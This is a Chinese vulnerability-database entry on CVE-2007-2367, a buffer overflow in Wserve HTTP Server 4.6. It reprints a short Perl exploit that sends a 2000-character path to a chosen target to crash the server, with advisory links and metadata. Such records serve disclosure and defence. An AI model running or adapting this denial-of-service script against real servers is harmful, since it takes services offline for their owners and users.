Wserve HTTP Server GET请求远程溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112633 漏洞类型 缓冲区溢出
发布时间 2007-04-05 更新时间 2007-05-09
CVE编号 CVE-2007-2367 CNNVD-ID CNNVD-200704-601
漏洞平台 Windows CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/3674
https://cxsecurity.com/issue/WLB-2007050001
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-601
|漏洞详情
WserveHTTPServer是Windows平台下的一款简单HTTP服务器。如果向WserveHTTPServer提交了包含有超长目录名的畸形GET请求的话,就可能触发缓冲区溢出,导致服务器拒绝服务。
|漏洞EXP
#!perl
# Wserve HTTP Server 4.6 Version (Long Directory Name) Buffer Overflow - Denial Of Service
# Type :
# Buffer Overflow - Denial of Service
# Release Date :
# {2007-04-05}
# Product / Vendor :
# Wserve HTTP Server
# http://sourceforge.net/projects/whttp
# PoC :
# GET / HTTP/1.0\r\n /127.0.0.1:80/AAAAAA[2000]. 
# Error :
# Buffer Overrun Detected!
# Program:...~\Temp\Rar$EX00.906\wserve\wserve_console.exe
# A buffer overrun has been detected which has corrupted the program's internal state.The program cannot safely continue 
# execution and must now be terminated

# Exploit :

use LWP::UserAgent;

$unique = LWP::UserAgent->new;

$address = shift or die("Insert A Target");

$req = HTTP::Request->new(POST => "http://$address:80/" . A x 2000);

$res = $unique->request($req);

print $res->as_string;

# Tested :

# --- Wserve HTTP Server 4.6 ---

# Vulnerable :

# --- Wserve HTTP Server 4.6 ---

# Author :

# UniquE-Key{UniquE-Cracker}
# UniquE(at)UniquE-Key.Org
# http://www.UniquE-Key.Org

# milw0rm.com [2007-04-05]
|参考资料

来源:BID
名称:23341
链接:http://www.securityfocus.com/bid/23341
来源:BUGTRAQ
名称:20070405WserveHTTPServer4.6Version(LongDirectory
名称)BufferOverflow-DenialOfService
链接:http://www.securityfocus.com/archive/1/archive/1/464819/100/0/threaded
来源:SREASON
名称:2647
链接:http://securityreason.com/securityalert/2647